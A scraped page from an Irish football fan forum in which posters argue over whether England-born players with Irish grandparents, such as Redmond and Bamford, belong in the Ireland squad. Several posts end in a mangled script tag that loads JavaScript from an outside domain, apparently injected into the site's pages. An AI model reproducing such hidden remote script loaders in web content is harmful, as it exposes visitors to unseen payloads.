Forum Home Forum Home : International : Republic Of Ireland
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Players eligible for Ireland

Post Reply Post Reply Page  <1 238239240241242 450>
Author
Paul McGrath
Paul McGrath
Cheese, it’s not just for eating

Post Options Post Options   Thanks (0) Thanks(0)   Quote lassassinblanc Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 3:59pm
Originally posted by pre Madonna pre Madonna wrote:

Originally posted by Sullivinho Sullivinho wrote:

I'd sooner watch McGoldrick chasing balls past the goal line than the right honorable Sir Bamford traipsing the ashes of his England dream half-heartedly around the Aviva. With his dad playing off him.

Nathan Redmond? Wore the England shirt 78 times, including once at full international level. Sick

Did you have a problem with David McGoldrick playing last night?McGoldrick who didn't know he had any Irish connection until 2014? Sure, he chose us over Scotland, but would he have chose us over England? Nathan Redmond has an Irish mother. England may well have been his first choice, but I don't see the difference between a lad having England as his first choice when he is younger and coming to us later and a lad who declares at 18/19 because he knows he won't make it for England. The only difference is the older lad, like Redmond or Bamford, is more likely to be better.

I agree with PM here, I wouldn't have any real issue with Bamford or Redmond as they'd improve our playing squad in an area we currently lack.

The old argument but think back to Townsend, Houghton etc. Ireland weren't their first choice growing up

Edited by lassassinblanc - 27 Mar 2019 at 3:59pm
Sponsored Links

Sullivinho View Drop Down
Alan Kernaghan
Alan Kernaghan

Post Options Post Options   Thanks (0) Thanks(0)   Quote Sullivinho Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 5:46pm

Did you have a problem with David McGoldrick playing last night?McGoldrick who didn't know he had any Irish connection until 2014? Sure, he chose us over Scotland, but would he have chose us over England?

None whatsoever. By all accounts, McGoldrick got his declaration/paperwork underway soon after discovering his eligibility. I have no problem with England being his first choice growing up.

Nathan Redmond has an Irish mother. England may well have been his first choice, but I don't see the difference between a lad having England as his first choice when he is younger and coming to us later and a lad who declares at 18/19 because he knows he won't make it for England. The only difference is the older lad, like Redmond or Bamford, is more likely to be better.

I believe international football is solely worth a damn because of the legitimate partisanship it supposedly stands for. I also reckon there's enough room for idealism and cynicism in a supporter's outlook and both rely on certain etiquettes and gut feelings.

A bit of pride goes a long way too. 

Now, If you're OK with a guy who played at full international level for England throwing on his green consolation prize, bully for you, Madge. Personally, I think it's a joke, devalues the international game and has me reminiscing on the scent of vomit. Just as the Rice saga and its bleeding heart thinkpieces did. Did the winner of the 'most pragmatic response' award ever collect their prize?

Similarly, one can placidly play along with Bamford's long game and bang out their joy on these forums the minute he finally declares.

I'll reserve the right to think he's not-so-subtly taking the piss.
Gerry Geary View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Gerry Geary Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 6:18pm
Redmond case is stronger ...he has an Irish mother raised by herself. does she hate Ireland?
Adobolo View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Adobolo Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 6:38pm
I don't think redmond will get much of a look in with England in the future especially now ward-prouse has passed him on the selection stakes. But still I don't want him for Ireland, after the anger I felt when Rice defected and I want the rules changed, I won't be hypocrical by been happy when a player defects to us. You play for a country that's it. Redmond is English and let it be.
Conan View Drop Down
Davey Langan
Davey Langan
I’m not very bright.

Post Options Post Options   Thanks (0) Thanks(0)   Quote Conan Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 6:39pm
What the likes of McClean don't seem to understand is that ALL his english teammates are likely playing in Green because they aren't good enough to play in white. Rice is an exception only in circumstance in that he developed to be good enough to be picked by England before he'd won a full (meaningful) cap. Unless they have all Irish family like Breen and Kilbane they are likely to support the country they are born and raised as well as be attracted to the better prospects of success and glory that come with it. 

The first step towards addressing whether we should be calling up the granny rulers is accepting the reality we are their second choice. I can live with the Ireland as a club mentality that all that matters is getting the best team of players, though I don't agree with it as it defeats what international football is about.....the pride in your country being represented. What offends me a lot more though is the layers of delusion and fabrication of an Irish identity, perpetuated by the newspapers and FAI that always have to hype up the 'I am so proud of honouring my dead granny from Co Mayo' angle to try and legitimise the whole process and try and give them some credibility. Its all horses**t but people just lap it up.< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">
gazurtoids View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote gazurtoids Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 6:48pm

Did you have a problem with David McGoldrick playing last night?McGoldrick who didn't know he had any Irish connection until 2014? Sure, he chose us over Scotland, but would he have chose us over England?

None whatsoever. By all accounts, McGoldrick got his declaration/paperwork underway soon after discovering his eligibility. I have no problem with England being his first choice growing up.

Nathan Redmond has an Irish mother. England may well have been his first choice, but I don't see the difference between a lad having England as his first choice when he is younger and coming to us later and a lad who declares at 18/19 because he knows he won't make it for England. The only difference is the older lad, like Redmond or Bamford, is more likely to be better.

I believe international football is solely worth a damn because of the legitimate partisanship it supposedly stands for. I also reckon there's enough room for idealism and cynicism in a supporter's outlook and both rely on certain <span -dobid="hdw">etiquettes and gut feelings.

A bit of pride goes a long way too. </span>

Now, If you're OK with a guy who played at full international level for England throwing on his green consolation prize, bully for you, Madge. Personally, I think it's a joke, devalues the international game and has me reminiscing on the scent of vomit. Just as the Rice saga and its bleeding heart thinkpieces did. Did the winner of the 'most pragmatic response' award ever collect their prize?

Similarly, one can placidly play along with Bamford's long game and bang out their joy on these forums the minute he finally declares.

I'll reserve the right to think he's not-so-subtly taking the piss.

I'm in 2 minds on this......alot depends on the quality of player available and how it would strengthen us and I reckon that applies to most so we're all talking out of our hoop mostly

But the whole Grealish/Rice saga was a real eye opener, probably won't be the last time we have cases like this......in an ideal world we scrap the whole granny idea altogether and try produce our own.....will never happen though
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Gerry Geary Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 7:08pm
Originally posted by Conan Conan wrote:

What the likes of McClean don't seem to understand is that ALL his english teammates are likely playing in Green because they aren't good enough to play in white. Rice is an exception only in circumstance in that he developed to be good enough to be picked by England before he'd won a full (meaningful) cap. Unless they have all Irish family like Breen and Kilbane they are likely to support the country they are born and raised as well as be attracted to the better prospects of success and glory that come with it. 

The first step towards addressing whether we should be calling up the granny rulers is accepting the reality we are their second choice. I can live with the Ireland as a club mentality that all that matters is getting the best team of players, though I don't agree with it as it defeats what international football is about.....the pride in your country being represented. What offends me a lot more though is the layers of delusion and fabrication of an Irish identity, perpetuated by the newspapers and FAI that always have to hype up the 'I am so proud of honouring my dead granny from Co Mayo' angle to try and legitimise the whole process and try and give them some credibility. Its all horses**t but people just lap it up.< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">

lawrenson Galvin Aldridge Michael Robinson the chose right. The 4 decided Ireland before england
grannyrule View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote grannyrule Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 7:13pm
Personally, I couldn't really give a damn if a fella bleeds Irish blood or not. All I care about is that the potential recruit can improve the squad. Give me 20 Nathan Redmonds over 20 Daryl Horgans any day.
The only way is up
The O'Shea View Drop Down
Jack Charlton
Jack Charlton
I know everything and I’m NEVER wrong

Post Options Post Options   Thanks (0) Thanks(0)   Quote The O'Shea Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 7:14pm

That is grade-A horsesh*t if I've ever seen it. The idea that anyone born in England will automatically regard themselves as English is simply nonsense. There are people born here who identify more closely with the their parents/grandparents country, so why would England be any different? There are literally hundreds of thousands of English-born people who will tell you they identify as Irish over English, is it not eminently possible that some of them are footballers?
We're decent enough..
gazurtoids View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote gazurtoids Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 7:33pm
Originally posted by The O'Shea The O'Shea wrote:

That is grade-A horsesh*t if I've ever seen it. The idea that anyone born in England will automatically regard themselves as English is simply nonsense. There are people born here who identify more closely with the their parents/grandparents country, so why would England be any different? There are literally hundreds of thousands of English-born people who will tell you they identify as Irish over English, is it not eminently possible that some of them are footballers?

When it comes to a career like football that adds an extra ingredient.....have we ever really got a top top English born player? probably the last was Lawrenson and we nicked him early ...........look at all the top England Internationals who could have played for Ireland, it's an extensive list from Rooney to Keegan, Gerard to Gasgoine ...........it's no coincidence they all chose to play for England
Conan View Drop Down
Davey Langan
Davey Langan
I’m not very bright.

Post Options Post Options   Thanks (0) Thanks(0)   Quote Conan Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 7:36pm
I've mentioned the likes of Breen and Kilbane as examples of english born players with a genuine sense of Irish identity. They are the exception to the rule though. The idea that an individual could have their sense of national identity defined by where their granny got hatched some time in the early 20th century is laughable. There is a point where you stop being Irish diaspora and just become English and that should be 2nd generation at the loosest definition and even then lads like Kane and Michael Keane whose Irish born fathers moved there as kids clearly feel English. None of our granny rulers have  chosen us over England at a time when England actually wanted them, they do it because England either stopped showing an interest or never would have done. If that doesn't matter to you having a squad littered with England rejects then fair enough but at least face up to the reality of it.< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">
Sullivinho View Drop Down
Alan Kernaghan
Alan Kernaghan

Post Options Post Options   Thanks (0) Thanks(0)   Quote Sullivinho Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 7:42pm
Originally posted by grannyrule grannyrule wrote:

Personally, I couldn't really give a damn if a fella bleeds Irish blood or not. All I care about is that the potential recruit can improve the squad. Give me 20 Nathan Redmonds over 20 Daryl Horgans any day.

That's your sole criteria eh? Mercenaries anonymous, bogus loyalty on the level of club football and English victory by proxy.

A revolting f**king scenario.

Disconnect the game and its players from the nation and international football is but an excuse to go as far as Tbilisi for a few drinks.
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Gerry Geary Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 7:48pm
We can't have a squad of English rejects. TONY GALVIN is the other we got from nowhere and his Tottenham team was a world class team back then. Cris hughton was better than both Pearce and Samson. Could have played for them. He chose Ireland.
grannyrule View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote grannyrule Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 7:55pm

That's your sole criteria eh? Mercenaries anonymous, bogus loyalty on the level of club football and English victory by proxy.

If we could get a Patrick Bamford instead of a Padraig Amond or a Nathan Redmond instead of a Daryl Horgan, then yes, give me those lads any day over the Irish born lads.
The only way is up
doherty View Drop Down
Jack Charlton
Jack Charlton
Teenage Kicks, so hard to beat

Post Options Post Options   Thanks (0) Thanks(0)   Quote doherty Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 8:09pm

If we could get a Patrick Bamford instead of a Padraig Amond or a Nathan Redmond instead of a Daryl Horgan, then yes, give me those lads any day over the Irish born lads.

Nah there has to be a line drawn somewhere for me.
The O'Shea View Drop Down
Jack Charlton
Jack Charlton
I know everything and I’m NEVER wrong

Post Options Post Options   Thanks (0) Thanks(0)   Quote The O'Shea Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 8:13pm
Originally posted by doherty doherty wrote:

Nah there has to be a line drawn somewhere for me.

The line is drawn very clearly, if you aren't eligible, you can't play.
We're decent enough..
zizu Kilbane View Drop Down
Jack Charlton
Jack Charlton

Post Options Post Options   Thanks (0) Thanks(0)   Quote zizu Kilbane Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 8:26pm
9 irish born lads in the starting XI yesterday...same for the 21s on Sunday. That's a good thing any way you look at it 
"Sometimes, sh*t happens, someone's gotta deal with it, and who ya gonna call?"
doherty View Drop Down
Jack Charlton
Jack Charlton
Teenage Kicks, so hard to beat

Post Options Post Options   Thanks (0) Thanks(0)   Quote doherty Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 8:33pm
Originally posted by zizu Kilbane zizu Kilbane wrote:

9 irish born lads in the starting XI yesterday...same for the 21s on Sunday. That's a good thing any way you look at it 

Ya. And we could have had a full 11 if we wanted baring injuries or micks own choice. Say we could have had egan and maguire or long etc. 
 Post Reply Post Reply Page  <1 238239240241242 450>
  Share Topic